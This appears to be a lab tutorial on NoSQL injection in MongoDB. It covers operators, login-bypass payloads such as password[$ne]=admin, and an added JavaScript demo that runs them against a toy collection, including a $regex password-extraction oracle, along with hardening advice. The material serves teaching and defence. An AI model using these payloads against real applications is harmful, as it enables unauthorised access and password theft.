NoSQL injection

NoSQL injection is a web security vulnerability that lets an attacker control the
queries a web application sends to its database. It happens when untrusted,
unfiltered web application input is passed into a database query, which can leak
information the user is not authorised to see. Beyond reading data, an attacker
can use NoSQL injection to modify data, escalate privileges, cause a denial of
service, and more.

Learning objectives

- Understand what NoSQL injection is
- Understand the NoSQL database (MongoDB) and how it maps to MySQL/MSSQL concepts
- Exploit NoSQL injection in MongoDB, including bypassing a login form

What is NoSQL?

A NoSQL database is a non-relational database; the name is read as "non SQL" or
"Not only SQL". It is a system for storing and retrieving data. NoSQL databases
are commonly used for big data and IoT workloads because of features such as fast
queries, ease of use for developers, easy scaling and flexible data structures.
There are various types of NoSQL databases, including MongoDB, Couchbase, RavenDB
and others; this page covers MongoDB.

MongoDB and MySQL

Like relational databases such as MySQL and MSSQL, MongoDB has databases, tables
and fields, but uses different names for them:

- Collections are similar to tables or views in MySQL and MSSQL.
- Documents are similar to rows or records in MySQL and MSSQL.
- Fields are similar to columns in MySQL and MSSQL.

Documents in MongoDB are objects stored in a format called BSON, a binary
serialisation that supports the JSON data types.

Understanding the NoSQL database

Start the MongoDB shell and list the databases:

    mongo
    show databases

Create a database, or connect to an existing one, with the use command; MongoDB
creates the database on the first write to it:

    use AoC3

Once the database is created, we can create new collections and list them:

    db.createCollection("users")
    db.getCollectionNames();

Insert a document and query the collection:

    db.users.insert({id:"1", username: "admin", email: "admin@thm.labs",
    password: "idk2021!"})
    db.users.find()

Remove a document, or drop the whole collection:

    db.users.remove({'id':'2'})
    db.users.drop()

Note: the legacy mongo shell has been replaced by mongosh, where insert() and
remove() are deprecated in favour of insertOne()/insertMany() and
deleteOne()/deleteMany(); the query syntax used below is unchanged.

MongoDB operators

- $eq      matches records that are equal to a certain value (equivalent to = in MySQL)
- $ne      matches records that are not equal to a certain value
- $gt      matches records that are greater than a certain value
- $where   matches records based on a JavaScript condition
- $exists  matches records that have a certain field
- $regex   matches records that satisfy a certain regular expression
- $and     equivalent to AND in MySQL
- $or      equivalent to OR in MySQL

Note that $where evaluates JavaScript on the database server, which makes it the
most dangerous operator to let user input reach; mongod can disable server-side
JavaScript with security.javascriptEnabled: false. Also note that $ne matches
documents in which the field is missing entirely, which matters for the
role[$ne] examples below.

Exploiting NoSQL injection (MongoDB)

First, you need to find an entry point that doesn't sanitise the user's input.

Next, you need to understand how the web application passes the request to the
database. Sometimes the web app accepts the user's input via GET or POST
parameters, and sometimes it accepts a JSON object, as is the case with APIs.
Injecting a NoSQL query therefore takes different forms depending on whether you
deal with GET, POST or JSON.

With GET or POST parameters, the injection works by sending the parameter in
array (bracket) form with a MongoDB operator as the key, e.g. role[$ne]=user.
Many web frameworks (PHP, and Node's qs/body-parser in extended mode) parse
such parameters into nested objects, so the application builds the filter
{role: {"$ne": "user"}} instead of matching a plain string value. The following
are examples of how to inject via the URL (GET):

    http://example.thm.labs/search?username=admin&role[$ne]=user
    http://example.thm.labs/search?username[$ne]=ben&role=user

The same concept applies to POST requests: pass the MongoDB operators in the
body parameters in the same bracket form. With a JSON API the operator object
can be sent directly in the request body.

Using NoSQL injection to bypass a login form

A login page typically calls one of the

    db.users.find({query})  or  db.users.findOne(query)

functions, where the query is JSON data sent via the application, for example:

    {"username": "admin", "password":"adminpass"}

Note that when we provide the correct credentials, a document is returned, while
a null reply is received when the credentials are wrong and nothing matches.

Injecting $ne into the password field makes the password condition true for any
value except the one supplied, so the admin document is returned without
knowing the password:

    db.users.findOne({username: "admin", password: {"$ne":"xyz"}})

Applying the same operator to both fields returns the first user that is not
admin, which is useful for enumerating other accounts:

    db.users.findOne({username:{"$ne":"admin"},password:{"$ne":"xyz"}})

Injected in the request (POST body or query string), the first query looks
like this:

    username=admin&password[$ne]=admin
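The following is an added example, not code from the original page or the lab it describes. It shows the mechanics behind the login bypass, the GET/POST injection examples and the operators listed above in one self-contained script: parseQuery imitates how a qs-style body parser turns password[$ne]=admin into {password: {$ne: "admin"}}; matches/findOne are a toy in-memory evaluator of the listed operators standing in for db.users.findOne(); the users array is constructed sample data mirroring the page's insert; vulnerableLogin and hardenedLogin are hypothetical handlers; and extractPassword goes beyond the page's bypass by using $regex as a character-by-character oracle.

```javascript
// Added example, not from the original page. Constructed sample data standing
// in for the AoC3 "users" collection (second user invented for enumeration).
const users = [
  { id: "1", username: "admin", email: "admin@thm.labs", password: "idk2021!" },
  { id: "2", username: "ben", email: "ben@thm.labs", password: "letmein" },
];

// Imitates the bracket-key parsing of qs / body-parser (extended: true):
// "username=admin&password[$ne]=admin" -> { username: "admin", password: { $ne: "admin" } }
// This is why a "string" parameter can reach the database as an operator object.
function parseQuery(queryString) {
  const out = {};
  for (const part of queryString.split("&")) {
    if (!part) continue;
    const eq = part.indexOf("=");
    const key = decodeURIComponent(eq < 0 ? part : part.slice(0, eq));
    const val = decodeURIComponent(eq < 0 ? "" : part.slice(eq + 1));
    const nested = key.match(/^([^\[]+)\[([^\]]*)\]$/);
    if (nested) {
      const [, field, sub] = nested;
      if (typeof out[field] !== "object" || out[field] === null) out[field] = {};
      out[field][sub] = val;
    } else {
      out[key] = val;
    }
  }
  return out;
}

// Toy evaluator for the operators listed on the page. A real app hands the
// filter to MongoDB; the semantics here follow MongoDB closely enough to show
// the injection (e.g. $ne also matches documents that lack the field).
function matchValue(actual, cond) {
  if (cond === null || typeof cond !== "object") return actual === cond; // implicit $eq
  return Object.entries(cond).every(([op, arg]) => {
    switch (op) {
      case "$eq": return actual === arg;
      case "$ne": return actual !== arg;
      case "$gt": return actual !== undefined && actual > arg;
      case "$exists": return (actual !== undefined) === (arg === true || arg === "true");
      case "$regex": return typeof actual === "string" && new RegExp(arg).test(actual);
      default: throw new Error(`operator ${op} not implemented in this toy evaluator`);
    }
  });
}

function matches(doc, filter) {
  return Object.entries(filter).every(([field, cond]) => {
    if (field === "$and") return cond.every((sub) => matches(doc, sub));
    if (field === "$or") return cond.some((sub) => matches(doc, sub));
    return matchValue(doc[field], cond);
  });
}

// Stand-in for db.users.findOne(filter): first matching document, or null.
function findOne(filter) {
  return users.find((doc) => matches(doc, filter)) || null;
}

// Vulnerable handler (hypothetical): parsed parameters go straight into the
// filter, i.e. db.users.findOne({username: body.username, password: body.password}).
// Plaintext password comparison is kept only to mirror the page's query.
function vulnerableLogin(body) {
  const { username, password } = parseQuery(body);
  return findOne({ username, password });
}

// Hardened handler (hypothetical): both credentials must be plain strings, so an
// operator object such as { $ne: "admin" } never reaches the query. A real
// handler would answer HTTP 400; null (login failed) keeps the comparison simple.
function hardenedLogin(body) {
  const { username, password } = parseQuery(body);
  if (typeof username !== "string" || typeof password !== "string") return null;
  return findOne({ username, password });
}

function escapeRegex(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}

// Beyond the page's bypass: with $regex the login becomes a yes/no oracle, so the
// password is recovered one character at a time from "document returned or not".
// Stops when no alphabet character extends the known prefix (so a character
// outside the constructed alphabet ends extraction early).
function extractPassword(username, alphabet) {
  let known = "";
  for (;;) {
    const next = [...alphabet].find((c) => {
      const pattern = "^" + escapeRegex(known + c);
      const body = `username=${encodeURIComponent(username)}` +
                   `&password[$regex]=${encodeURIComponent(pattern)}`;
      return vulnerableLogin(body) !== null;
    });
    if (next === undefined) return known;
    known += next;
  }
}

// Demo of the page's requests against the toy collection.
console.log(vulnerableLogin("username=admin&password[$ne]=admin"));          // admin's document
console.log(vulnerableLogin("username[$ne]=admin&password[$ne]=xyz"));       // ben's document
console.log(hardenedLogin("username=admin&password[$ne]=admin"));            // null
console.log(extractPassword("admin", "abcdefghijklmnopqrstuvwxyz0123456789!")); // idk2021!
```

The type check in hardenedLogin is the minimal fix; in a real Express application the same effect is usually obtained with a schema validator or a middleware such as express-mongo-sanitize, which strips keys beginning with $ (and containing .) from req.body, req.query and req.params before any handler runs. Both approaches also defeat the JSON-API variant, where the client sends {"password": {"$ne": ""}} directly rather than relying on bracket parsing.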